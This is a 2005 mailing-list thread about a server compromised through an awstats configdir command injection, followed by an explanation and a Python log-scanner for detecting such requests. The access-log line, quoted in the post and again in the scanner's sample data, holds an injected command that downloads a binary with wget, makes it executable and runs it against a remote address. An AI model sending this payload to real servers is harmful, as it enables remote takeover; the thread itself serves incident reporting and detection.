SLUG Mailing List Archives

Hi,

I've just checked my logs and found this nasty little access:

access.log.1:128.xxx.xxx.xxx - - [11/May/2005:08:26:44 +1000] "GET //cgi-bin/awstats.pl?configdir=|%20cd%20%2ftmp%3brm%20-f%20%2ftmp%2fc%3bwget%20128.xxx.xxx.xxx%2fc%3bchmod%20%2bx%20c%3b.%2fc%2080.xxx.xxx.xxx%2080%20| HTTP/1.1" 200 732 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

Ouch! They'd tried to run:

cd /tmp;rm -f /tmp/c;wget 128.xxx.xxx.xxx/c;chmod +x c;./c 80.xxx.xxx.xxx 80

Voytek, how did you notice you'd been exploited?

/me wishes he'd switched on authentication earlier...

Rob.

On Sun, 2005-05-22 at 00:09 +1000, Voytek Eymont wrote:
> I just found how my server was exploited, through awstats.
>
> even though I've set it as per warning to disallow browser updates:
>
> # grep 'AllowToUpdateStatsFromBrowser=1' *
> # grep 'AllowToUpdateStatsFromBrowser=0' *
> awstats.common:AllowToUpdateStatsFromBrowser=0
> awstats.conf:AllowToUpdateStatsFromBrowser=0
> awstats.mail.conf:AllowToUpdateStatsFromBrowser=0
> awstats.model.conf.rpmsave:AllowToUpdateStatsFromBrowser=0
>
> the attacker executed wget/lwp_download to d/l malicious code and execute
> using (I think ?) some kernel vulnerability
>
> --
> Voytek

--
Rob Sharp
email/jabber/msn: robATsharp.id.au
web: http://sharp.id.au
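The request Rob quotes is the awstats `configdir` command injection: vulnerable awstats builds a filename from the `configdir` query parameter and hands it to Perl's two-argument open(), which treats a value wrapped in `|` as a shell pipeline. The parameter is read before any awstats config file is loaded, which is why Voytek's `AllowToUpdateStatsFromBrowser=0` did not help. The script below is an added example for spotting that pattern in an Apache access log; it is not code from the thread or from the awstats project. The log lines are constructed with documentation IP addresses (the first one mirrors the quoted request), and the `classify`/`scan` function names and the "exploit"/"suspicious"/"benign" verdicts are this example's own.

```python
import re
from urllib.parse import parse_qs

# Constructed Apache combined-format lines (not from the original post).
# Line 1 mirrors the attack request quoted in the thread, with placeholder addresses.
SAMPLE_LOG = """\
192.0.2.10 - - [11/May/2005:08:26:44 +1000] "GET //cgi-bin/awstats.pl?configdir=|%20cd%20%2ftmp%3brm%20-f%20%2ftmp%2fc%3bwget%20192.0.2.10%2fc%3bchmod%20%2bx%20c%3b.%2fc%20198.51.100.20%2080%20| HTTP/1.1" 200 732 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
198.51.100.7 - - [11/May/2005:09:00:01 +1000] "GET /cgi-bin/awstats.pl?config=example.com&output=main HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.9 - - [11/May/2005:09:05:12 +1000] "GET /cgi-bin/awstats.pl?configdir=%2fetc%2fawstats&config=example.com HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
"""

# client ip, timestamp, method, request target and status from a combined-format line
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Things that have no business in a directory name: shell separators, download tools,
# and the world-writable staging directory used in the quoted attack.
SHELL_META = re.compile(r'[;|`$&]|\bwget\b|\bcurl\b|\blwp-download\b|/tmp/')


def decode_configdir(target):
    """Return the URL-decoded configdir value of a request target, or None."""
    if "?" not in target:
        return None
    query = target.split("?", 1)[1]
    # parse_qs percent-decodes each value, so %2f, %3b, %2b come back as / ; +
    values = parse_qs(query).get("configdir")
    return values[0] if values else None


def classify(line):
    """Classify one access-log line; returns None for lines that do not matter."""
    m = LOG_RE.match(line)
    if not m or "awstats.pl" not in m.group("target"):
        return None
    configdir = decode_configdir(m.group("target"))
    if configdir is None:
        return None
    value = configdir.strip()
    record = {"ip": m.group("ip"), "ts": m.group("ts"), "status": m.group("status")}
    if value.startswith("|") or value.endswith("|"):
        # Perl two-argument open(): a leading or trailing '|' turns the "filename"
        # into a shell command, so the payload is everything between the pipes.
        record.update(verdict="exploit", payload=value.strip("|").strip())
    elif SHELL_META.search(value):
        record.update(verdict="suspicious", payload=value)
    else:
        record.update(verdict="benign", payload=value)
    return record


def scan(log_text):
    """Run classify() over every line and keep the awstats configdir requests."""
    return [r for r in (classify(l) for l in log_text.splitlines()) if r]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["ip"]} {hit["verdict"]:10} {hit["payload"]}')
```

A 200 status on the exploit line is not reassuring: awstats returned its normal page while open() ran the pipeline, which is exactly what the quoted log shows. Run the scan over rotated logs too (`access.log.1` and older), since the request that planted the payload usually predates whatever made the compromise noticeable.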